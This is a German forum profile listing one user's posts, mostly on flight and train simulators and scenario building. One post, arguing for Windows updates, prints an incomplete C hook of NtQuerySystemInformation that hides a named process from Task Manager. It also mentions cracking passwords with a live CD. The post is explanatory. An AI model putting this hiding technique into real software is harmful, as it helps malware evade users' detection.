Beiträge von Scarlet
-
-
-
Moin,
FSX ist die schönere Simulation, X-Plane ist die bessere Simulation (im technischen Sinne). Beim FSX wird das Flugverhalten quasi aus einer Tabelle ausgelesen, X-Plane berechnet ein Strömungsmodell. Dafür gibt es für FSX schönere Flughäfen in größerer Anzahl. Auch das Thermik-Modell von X-Plane ist dem FSX deutlich überlegen, Segelfliegen macht da wirklich sehr viel mehr Spaß. Windenschlepp etc. geht beim FSX auch nur mit AddOn, X-Plane kann das auch so. Grundsätzlich kann man zwar manche Schwächen des FSX durch AddOns ausgleichen, da bist du dann aber schnell über die € 300 hinausgeschossen.
Für FSX gibt es VFR-AddOns (Sichtflug => echte Luftbilder und Wahrzeichen wie z.B. Kraftwerke, Hochhäuser, Bahnhöfe; "VFR Germany" und "German Airfields" von Aerosoft), bei denen du danach sehr gut auf Sicht fliegen kannst. X-Plane basiert auf OpenStreetMaps, da hast du auch ohne AddOns sehr genaue Straßen, Schienen und Häuser. An den FSX mit VFR-AddOns kommt das aber nicht ran, dem "nacktem" FSX ist es aber deutlich überlegen. Außerdem unterstützt X-Plane ohne Mods keine Jahreszeiten (mit Wintertexturen). IFR-Flüge (Instrumentenflug) gehen grundsätzlich bei beiden Simulatoren, die ATC (Flugsicherung) ist aber beim FSX ein ticken besser, da kannst du auch VFR-Flüge vom KI-ATC "begleiten" lassen. Letzteres geht mit X-Plane (noch) nicht. Es gibt auch ATC-AddOns für den FSX, damit wird es dann tatsächlich ganz brauchbar. Die beste Flugsicherung gibt es natürlich online, das gilt für beide Simulatoren.
Beim FSX gibt es inzwischen wohl fast jeden Flughafen der mehr als eine Graspiste hat (manchmal sogar die => "German Airfields") als AddOn. Bei X-Plane gibt es inzwischen die großen Flughäfen auch als AddOns, kleinere Flugplätze wenn überhaupt nur als Freeware.
Mit Flugzeugen (mit Systemtiefe) sieht es bei X-Plane sehr mager aus. Zwar hat schon die Standard-747 ein (stark vereinfachtes) FMS und die kleinen Propellermaschinen haben z.T. ein schönes GPS eingebaut, aber wirklich Spaß machen die (genau wie die Standard-Flieger des FSX) alle nicht. Gute AddOns sind rar, die 777 (PMDG-Niveau!) und die 727 sind sehr gut, auch der CRJ-200 ist schön und fliegt sich ausgezeichnet. Wenn du dich auch für kleinere Maschinen erwärmen kannst: Alles von Carenado sieht sehr gut aus und fliegt sich ordentlich, die stellen auch FSX-Flugzeuge her. Irgendwann wird PMDG langfristig wohl auch für X-Plane eine 737 herausbringen, aber das kann halt noch Jahre dauern. Beim FSX gibt es dagegen fast alles.
Beim FSX ist das Ende der Fahnenstange relativ sicher erreicht, eine echte neue Version wird es nicht geben. Ob P3D (Prepar3d, FSX in einer "militärischen" Version vom Waffenhersteller Lockheed-Martin) irgendwann noch als 64-bit Version erscheint, ist durchaus noch nicht 100% sicher. Was DTG aus der Plattform macht... Naja.
X-Plane hat von allen Simulatoren wohl noch die besten Chancen langfristig weiterentwickelt zu werden.Frankfurt und Wien gibt es für X-Plane (EDDF; LOWW) und FSX (EDDF; LOWW).
Grüße
-
Ich gebe das "Zepter" dann mal an den nächstbesten weiter, ich hätte nur Texturfotos zur Hand.

-
Ich werfe mal "Cham (Oberpf)" in den Topf.
-
Moin,
ZitatEs gibt ein Sprichwort das heißt never change a running system.
Ja, aber wenn dein Auto 'nen Platten hat solltest du das running system durchaus changen.
ZitatUnd ausserdem, wenn irgendwelche Hacker oder sonstige Personen dieser Art genau wissen, dass derer Hintertürchen gepatcht werden, probieren sie es doch erst garnicht aus oder?
Nein. Die meisten Exploitkits feuern einfach mal alles ab was irgendwie auf dein System passen könnte oder greifen halt direkt den Browser, Flash oder Java an. Außerdem gibt es genug Benutzer, die genau wie du handeln. Daher lohnt es sich immernoch, die "alten" Exploits in Stellung zu bringen.
ZitatWenn ich mir jetzt eine DFÜ Ader hier an die Telefondose ziehen würde (ja wir haben hier noch einen Telekom Analog-Anschluss, ohne Voice over IP, mit ganz normalem DSL über selbige) und einfach eine Telefonnummer eines Partners anrufen würde, der das gleiche System nutzt könnte ich bestimmt Daten übermitteln, ohne dass die NSA der BND oder sonst wer davon Wind bekommt.
Nein. Denn dein Anschluss ist nur bis zu einem der ersten Verteilerkästen analog. Danach werden die Daten per IP-Technik weitergegeben, die alten Elektromechanischen Relayschalter-Kästen sind schon lange Geschichte. Und Datenübertragung unterscheidet sich durchaus von Sprache, das kann man durchaus rausfiltern.
ZitatVermutlich sind die Sicherheitslücken von Win95 unterdessen die sichersten der Welt, weil einfach kein Hacker mehr probieren wird, über ganz primitive Zugägnge in das System zu kommen, weil es faktisch keiner mehr benutzt.
Das ist falsch. Häng ein ungepatchtes Win95 eine Stunde ungesichert (ohne Firewall) ans Netz. Da ist dann unter Garantie irgendein uralter Wurm drauf. Mal ganz abgesehen davon, dass ein Angreifer durchaus sehen kann, welches Betriebssystem auf einem Computer läuft. Und wenn das Exploitkit "Windows 95" oder "Windows NT" anzeigt, wird halt die Sicherheitslücke von 1998 ausgepackt.
ZitatOder wer weiß heute noch, dass man früher bei der Abfrage nach Benutzername und Passwort auf Win95 98 (weiß jetzt nicht mehr genau) einfach nur auf Abbrechen drücken musste, und schon war man auf dem Computer. So primitiv denkt doch heute keiner mehr.
Das ist wahr, heute startet man ein Linux-Livesystem von einer CD und knackt das Passwort innerhalb weniger Minuten.
ZitatUnd wer auf der aktuellst gepatchten Version von Win8.1 unerlaubten Zugang erhält, der erhält auch auf den ungepatchten Versionen zugriff.
Ja, allerdings geht es ohne Updates wesentlich leichter. In den letzten fünf Jahren gab es soviele kritische Lücken, dass eine Aufzählung wohl das Zeichenlimit eines Beitrages sprengen würde.
ZitatDa nützt mir das Patchen auch nix mehr.
Nein, aber verschlüsseln.
ZitatIn all den Jahren ist mir noch nicht ein Wurm oder Virus oder sonstwas auf dem Rechner gelandet.
Oder du hast es schlicht nicht gefunden. Nicht jede Malware meldet sich mit "Zahle jetzt drölfzig Euro über diesen kruden Geldversand!".
ZitatUnd ich überprüfe regelmäßig die Prozesse im Taskmanager die laufen,
Prozesse können sich vor dem Taskmanager verstecken, Stichwort Hooks. Die Malware lädt sich selbst in den jeweiligen Prozess, "überschreibt" die Funktion der Wahl (hier: "NtQuerySystemInformation", das verwendet z.B. der Taskmanager) mit einer eigenen Version, die wiederum die echte Funktion aufruft, das Ergebnis nach seinem eigenen Prozess durchsucht und diesen aus dem Ergebnis löscht. Diese manipulierte "Liste" wird dann weitergegeben. => Prozess weg. Dagegen kann sich die Anwendung zwar theoretisch schützen, ich kenne aber keinen einzigen Taskmanager der das tut.
So etwas hatte ich vor etlichen Jahren mal gebastelt, sieht dann ungefähr so aus:
(Keine Sorge, der Code ist so nicht lauffähig. Es fehlen alle Header und der eigentliche "füge diese Funktion unferiwillig in eine Anwendung ein" Code.)Code
Alles anzeigenNTSTATUS HookedNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) { NTSTATUS HookedTmpNtQuerySI = HookedNOPNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength); if (HookedTmpNtQuerySI == STATUS_SUCCESS) { if (SystemInformationClass == SystemProcessInformation) { PSYSTEM_PROCESS_INFORMATION HookedTmpSPICur = (PSYSTEM_PROCESS_INFORMATION) SystemInformation; PSYSTEM_PROCESS_INFORMATION HookedTmpSPIPre = HookedTmpSPICur; while(1) { char *HookedTmpProcessName = (char *) GlobalAlloc(GMEM_ZEROINIT, HookedTmpSPICur->ImageName.Length + 2); WideCharToMultiByte(CP_ACP, 0, HookedTmpSPICur->ImageName.Buffer, HookedTmpSPICur->ImageName.Length + 1, HookedTmpProcessName, HookedTmpSPICur->ImageName.Length + 1, NULL, NULL); if(!_strnicmp(HookedTmpProcessName, Hooked_CONFIG_HIDEPROCESS, strlen(Hooked_CONFIG_HIDEPROCESS))) { if (HookedTmpSPICur->NextEntryOffset == 0) { HookedTmpSPIPre->NextEntryOffset = 0; break; } else { HookedTmpSPIPre->NextEntryOffset += HookedTmpSPICur->NextEntryOffset; HookedTmpSPICur = (PSYSTEM_PROCESS_INFORMATION) ((PCHAR) HookedTmpSPICur + HookedTmpSPICur->NextEntryOffset); } } else { if (HookedTmpSPICur->NextEntryOffset == 0) break; HookedTmpSPIPre = HookedTmpSPICur; HookedTmpSPICur = (PSYSTEM_PROCESS_INFORMATION) ((PCHAR) HookedTmpSPICur + HookedTmpSPICur->NextEntryOffset); } if (HookedTmpProcessName) GlobalFree(HookedTmpProcessName); } } else if (SystemInformationClass == 53) { PSYSTEM_PROCESS_INFORMATION HookedTmpSPICur = (PSYSTEM_PROCESS_INFORMATION) SystemInformation; PSYSTEM_PROCESS_INFORMATION HookedTmpSPIPre = HookedTmpSPICur; while(1) { char *HookedTmpProcessName = (char *) GlobalAlloc(GMEM_ZEROINIT, HookedTmpSPICur->ImageName.Length + 2); WideCharToMultiByte(CP_ACP, 0, HookedTmpSPICur->ImageName.Buffer, HookedTmpSPICur->ImageName.Length + 1, HookedTmpProcessName, HookedTmpSPICur->ImageName.Length + 1, NULL, NULL); if(!_strnicmp(HookedTmpProcessName, Hooked_CONFIG_HIDEPROCESS, strlen(Hooked_CONFIG_HIDEPROCESS))) { if (HookedTmpSPICur->NextEntryOffset == 0) { HookedTmpSPIPre->NextEntryOffset = 0; break; } else { HookedTmpSPIPre->NextEntryOffset += HookedTmpSPICur->NextEntryOffset; HookedTmpSPICur = (PSYSTEM_PROCESS_INFORMATION) ((PCHAR) HookedTmpSPICur + HookedTmpSPICur->NextEntryOffset); } } else { if (HookedTmpSPICur->NextEntryOffset == 0) break; HookedTmpSPIPre = HookedTmpSPICur; HookedTmpSPICur = (PSYSTEM_PROCESS_INFORMATION) ((PCHAR) HookedTmpSPICur + HookedTmpSPICur->NextEntryOffset); } if (HookedTmpProcessName) GlobalFree(HookedTmpProcessName); } } } return HookedTmpNtQuerySI; }Zitatdie Dienste, die versteckten Programme im Autostart, und wenn mir was Spanisch vorkommt, dann lasse ich mir einfach alle 400´000 Dateien auf meinem PC anzeigen, und sortiere sie nach Änderungsdatum.
Natürlich funktioniert das oben gezeigte auch beim Autostart-Fenster, der Registry und dem Explorer. D.h. du siehst die Dateien garnicht, außer du verwendest ein Linux-Livesystem. Merke: NIEMALS ein möglicherweise kompromittiertes System mit sich selbst überprüfen.
ZitatUnd wenn, dann war die Schadsoftware schneller wieder runter, als man schauen konnte.
Das kann die Schadsoftware anders sehen. Auch ein Virenscanner ist nicht vertrauenswürdig, wenn er von einem kompromittierten System ausgeführt wird. Lieber sowas nutzen. Oder gleich neu aufsetzen.
Das ist wirklich nicht böse gemeint, aber dein Rechner ist eine potenzielle gigantische Viren- und Spamschleuder.
Meiner Meinung nach sollte es auf Windows Home Premium etc. die Option zum Ausschalten der Updates nicht geben. Da sollte einfach drübergepatcht werden, mit Option zum nachträglichen Entfernen bei Problemen.Grüße
-
Zitat von Prelli
Darüberhinaus sind nicht alle vR-Loks so gestaltet (z.B. Ludmilla)
Zitat von AbsolutesChaozDas ist für mich persönlich der größte Minuspunkt an den vR EL Produkten
=> Ludmilla ist keine EL-Lok.Zitat von PrelliDavon abgesehen wäre die Alternative eine Hebel-Vor-Lok, wie man sie z.B. von DTG kennt.
Nein, wäre es nicht, zumindest nicht zwingend. Oder ist z.B. die "Super Voyager" von JT eine Hebel-Vor-Lok?Grüße
-
Zitat von RW1969
ich habe die stellungnahme aufmerksam gelesen. was mich dazu interessiert:
beim lesen - ist mir immer wieder das wort " altmark strecke " aufgefallen.
es ging doch aber damals um die veröffentlichung von der " sachsen anhalt " von christopher als
betha version - für die jenigen - welche sie haben / testen wollen mit der anfrage / bitte einer kleinen
spende.
Es wurde auch mit der Altmarkstrecke seitens COtto "Schindluder" betrieben. Weit vor dem "Sachsen-Anhalt-Vorfall".Schön zu lesen, dass das RLB-Team nicht aufgibt.

Grüße
-
Moin,
soeben habe ich das Problem aus purem Zufall gelöst. Ich hatte irgendwann die Animationen versehentlich als Action "gebacken". Als ich die hintere Uhrzeigerseite wegen eines kleinen Lapsus beim Kopieren der Zeiger erneut normal mit Keyframes animierte, funktionierte alles wieder tadellos.
Zitat von Cotten Eye JoeWirklich geil fände ich, wenn man ein Szenario erstellt und dann bei Beginn des gleichen der Fahrplanzielbahnhof (evtl. mit Zwischenstationen) in dem Anzeigekasten zu lesen und in der Lok eine funktionsfähige EBuLa mit allen Streckendaten verbaut wäre. *träum*
Das wäre wirklich schick. Ich bin ja schon froh, dass man die Szenarien im Gegensatz zum ollen MSTS überhaupt mit Objekten und so Zeuchs "anreichern" kann.
Vielen Dank und Grüße
-
Zitat
Ziffernblatt und Zeigersatz sind 2 Objekte
Genau, die drei Zeiger der beiden Seiten sind jeweils ein Childobjekt der ZZA. Jeder Zeiger ist in 360 Frames um 360 Grad drehend animiert.
ZitatDer Zeigersatz hat meiner Meinung nach an seiner Vorderseite in der Mitte so ein Nupsi als Markierung.
In Railworks oder Blender? Meinst du den Objektmittelpunkt? Ich stehe etwas auf dem Schlauch, pardon.

Wie gesagt, grundsätzlich funktioniert die Uhr ganz normal, zumindest sobald sie sich "gestellt" hat.
Grüsse und Danke
-
Zitat
bestimmt was falsch gescriptet
Öhm, das ist doch einfach nur ein Analogue Clock Blueprint? Das "scripten" übernimmt ja Railworks.
-
Moin,
ich baue gerade an kleineren Assets für einige Szenarios, darunter auch alte, rote Fallblattzugzielanzeigen der Bundesbahn, natürlich mit angeflanschten Uhrkästen. Funktioniert alles ganz toll, allerdings verhält sich der Minutenzeiger (minhnd) in den ersten 10 bis 20 Sekunden nach Start der Simulation seltsam. Er startet ca. 30 Minuten verfrüht und läuft dann im Sekundentakt rückwärts zur "echten" Simulationszeit. Startzeit des Szenarios im Video ist 12:30:00.
Externer Inhalt www.youtube.comInhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.Ist nicht weiter dramatisch, bei anderen Uhren konnte ich dieses Phänomen aber nicht beobachten. Was habe ich da verschusselt?
Grüße
-
Moin,
Zitat von bob99Was mir aber so überhaupt nicht gefällt ist wenn ich mir für ein Szenario neben den TTB-Erweiterungen noch mehrere andere kommerzielle und nicht kommerzielle Erweiterungen zwangsweise kaufen muss damit ich ein "schönes" Szenario spielen kann.
Die TTB-Erweiterungen sind halt auch nicht die eierlegende Wollmilchsau für jede Situation. Der eine möchte in einem Szenario lieber älteres Zeug fahren lassen, der nächste hält nichts von MSTS-Konverts.Das grundlegende Problem der ganzen Geschichte und warum alles nicht mehr so wie früher läuft liegt doch ganz woanders. Zufällig habe ich hier noch ein altes GR-AddOn aus MSTS-Zeiten rumliegen, GR6 Rostock-Stralsund. Ich zitiere:
Zitat von GR6-SchachtelAlles anzeigenEnthaltene Lokomotiven:
BR 243 DR
BR 118 DR
BR V 120 DR
BR VT 172 DR
BR 323 DR
BR 106 DR
BR V36 DRZahlreiche Personen- und Güterwagen
Damit kann man einigermaßen stimmige Aufgaben bauen, das ganze AddOn war eine "AllInOne"-Lösung. Im Vergleich dazu M-GAP: Enthalten ist die BR 101, IR/IC-Wagen und BR 426. Bei dieser großen Auswahl ist man natürlich kaum eingeschränkt, von "Fahren Sie diesen modernen IC nach Garmisch" bis "Fahren Sie diesen modernen RE nach Murnau" ist alles dabei...Natürlich ist dieser Vergleich hochgradig unfair, die MSTS-Schuhkartons sind mit den Modellen für den TS20xx in keinster Weise vergleichbar, die Entwicklungszeit von quasi allem (Strecken, Rollmaterial, Szenarien) liegt um etliche Faktoren höher als beim MSTS. Allein das Rollmaterial von GR6 könntest du heute (als Neubau in TS20xx-Qualität versteht sich, das MSTS-Zeug könnte man "nur" für 30€ in einem Szenariopack verkaufen
) für 7x 9,99€ + Repaintversionen verkaufen. Auch hat sich die Qualität der Szenarien seit dem RailSimulator stark gesteigert, manches (Freeware-)Szenario hat inzwischen mehr Scriptanweisungen als die alten Kuju-Loks, von Ansagen und Zugzielanzeigen nicht zu sprechen.Doch das ändert nichts an dem "Grundproblem" für Szenarienbauer: Ohne zusätzliche (Payware-)AddOns (und sei es nur das ELAP) ist es sehr schwer bis unmöglich, glaubwürdige Szenarien zu erstellen. Es ist schlicht in quasi allen deutschen AddOns dafür zu wenig (KI-)Rollmaterial enthalten. Und das wird sich vermutlich so schnell nicht ändern. Man hat schlicht keine andere Wahl, als auf weitere externe Payware / Freeware zurückzugreifen. Die Alternative wäre, das Rollmaterial als Aufgabenersteller selbst zu bauen oder nur noch Aufgaben à la "Bundesweit sind alle BR 423 in Flammen aufgegangen. Sie fahren einen lokbespannten Ersatzzug mit der BR 143." oder "Sie fahren im Jahre 1999 einen InterRegio mit einer BR 143. Wundern Sie sich nicht, Krauss-Maffei hat über Nacht über 200 Prototypen der BR 101 in Schwarz und Silber abgeliefert!!!1" zu bekommen.
Der beste Kompromiss ist meiner Meinung nach, mehrere Versionen eines Szenarios anzubieten. Aber auch das geht je nach Aufgabe nur bis zu einem gewissen Grad - z.B. nur Steam-AddOns zu verwenden. Beim TS kauft man halt eher wie bei einer Modellbahn Loks, Wagen und Strecken separat. Geht aber alles noch separierter und teurer, siehe EEP.
@Lokheini: Dafür hat so eine 747 von PMDG für den Preis von zweieinhalb ExpertLines auch mindestens das zweieinhalbfache an Funktionen und Systemtiefe. Das muss fairerweise auch dazugesagt werden.
Grüße
-
Moin,
freut mich, wenns gefällt.
Zitat von sven77Ich war an allen Unterwegsbahnhöfen zu spät und hatte deshalb im F1-Fenster jeweils ein Kreuz statt einem Haken. Das ist aber meiner Ansicht nach vom Erbauer sogar gewollt (wetterbedingt). Am Schluss der Aufgabe bekommt man nämlich dennoch eine positive Meldung und auch in der Szenarienliste ist der grüne Haken gesetzt.
So ist es, eine Verspätung von ~ 5 Minuten ist "normal". Das Szenario ist nach realem (sehr straffen) Fahrplan gebaut, der Spieler fährt aber (gewollt; => Schneechaos) knapp vier Minuten zu spät ab, 'nen grünen Haken gibt es am Ende natürlich trotzdem.Zitat von Clemens HoffmannIn dem Lets Play was ich dazu gesehen habe war der Fahrplan einhaltbar, und dass war ohne Update.
Das will ich sehen. Die arme 103!
Grüße
-
Zitat von BkBtMarcel
Na falls es Hamburg-Berlin geben sollte wollen die doch nicht wirklich einen schon existierenden und auch nochmal zusätzlich performancenehmenden Teil dazuquetschen...? Uelzen-Berlin würde reichen, dann macht man mit HH-H weiter.
Nicht wirklich, stell dir vor M-GAP würde kurz hinter München-Westkreuz enden, weil man für den Appendix München-Pasing - München Hauptbahnhof auf M-A weitermachen könnte. Oder Seddin wäre wirklich nur die Strecke nach Seddin, auf freier Strecke muss dann die Strecke gewechselt werden.

Grüße
-
-
denisfl: Du verwendest die Version ohne die IR-Wagen von RW/0381, oder? Fehlen die Wagen (Falls ja - Welche zeigt er als fehlend an?) oder wird einfach die "Kupple Wagen an"-Aufgabe nicht erfüllt? Kann sein dass ich vergessen habe die Anweisung auf die "neuen" Wagennummern umzubiegen. Wenn du die Wagen normal ankuppelst und, nachdem das Signal freie Fahrt anzeigt, losfährst, sollte danach alles normal laufen. Du solltest dann sogar trotzdem am Ende des Szenarios einen grünen Haken haben, der wird per Script erzwungen. Ich fix das sobald ich ein bisschen Zeit hab.

Stefan: Danke, das Lob für die Funksprüche gebe ich weiter. Weiterer KI-Verkehr in München ist für ein Update notiert, am Ende ist mir schlicht zeittechnisch die Uni reingegrätscht.
ZitatNoch mal ca 10 Jahre zurück in der Zeit wäre hier auch noch sehr interessant!

In die '90er? Das wäre wirklich interessant, auch wenn mir jetzt schon vor den Umbauten graut. 2001/02 kann man ja durchaus schon viele Bahnhöfe in "Dunkelblau/Weiß" lassen, 199X müsste man wirklich jeden einzelnen Kaff-Bahnhof komplett Babyblau oder sogar noch 60er-Jahre "Großbuchstaben-Futura-Schwarz/Weiß" überkleben. Das wäre aber eher was für Köln-Koblenz und wenn man eh schon alles umbauen muss gleich in die '80er-Jahre - Mit der 103 + Rheingold und ganz vielen Silberlingen & Bm-Wagen als KI...

Grüße
-
So, gefixte Version ist oben. Sollte jetzt nur noch auf die 103 referenzieren.
Grüße
-
Mea Culpa. Du meinst vermutlich "Zeitreise ins Alpenland".
Ich Trottel habe in dem Szenario statt den Wagen Epoche 4 die uralten vR Eurofimawagen in Orientrot von anno Zwieback verbaut. Ich fix das noch heute, da hab ich schlicht geschludert.
Grüße
-
Moin,
zum zweiten Advent gibt es das zweite Adventsszenario "Zeitreise ins Alpenland". Download im ersten Post.
Shamandalie & Birkenmoped: Danke für das Feedback, mit Erscheinen des zweiten Teils von Augsburg nach München werde ich eine nach Möglichkeiten gefixte Version hochladen.
Zitatdie Entfernungsangaben im HUD spielen etwas verrückt bzw. sind während der Fahrt bei mir nicht zu gebrauchen gewesen
Liegt an Railworks, kann ich leider nicht ändern. Wenn du das Szenario im Editor öffnest, siehst du viele versteckte "Haltepunkte". Die werden für Ansagen und Scripte gebraucht. Dadurch spinnt die Entfernungsanzeige.
Zitatnoch ne 2te Stimme für den Fahrdienstleiter und/oder Zugbegleiter und es wäre perfekt!
Die nächsten Szenarien werden alle noch von einer Stimme gesprochen, da ich diese Aufgabe bereits an meinem Kommilitonen Simon "outgesourced" habe (im Sounddesign habe ich zwei linke Hände) und die schon eingesprochen auf der Platte liegen. Danach muss ich mal schauen, ob ich Funk übernehme und Simon den Zub, evtl. hat ja jemand aus dem Forum lust sich sprachlich einzubringen - Aber das ist erst in ein paar Wochen relevant. Die Ansagen und gesprochenen Anweisungen sind auch eher als "Bonus" gedacht, wichtige Sachen wie FdL-Anweisungen gibt es aus dem Grund auch immer noch als Text zum nachlesen.
ZitatFür mich persönlich fehlte im Gegenverkehr jedoch ein bisschen der Güterverkehr
Das stimmt, vorallem für die Uhrzeit. Danke!
Grüße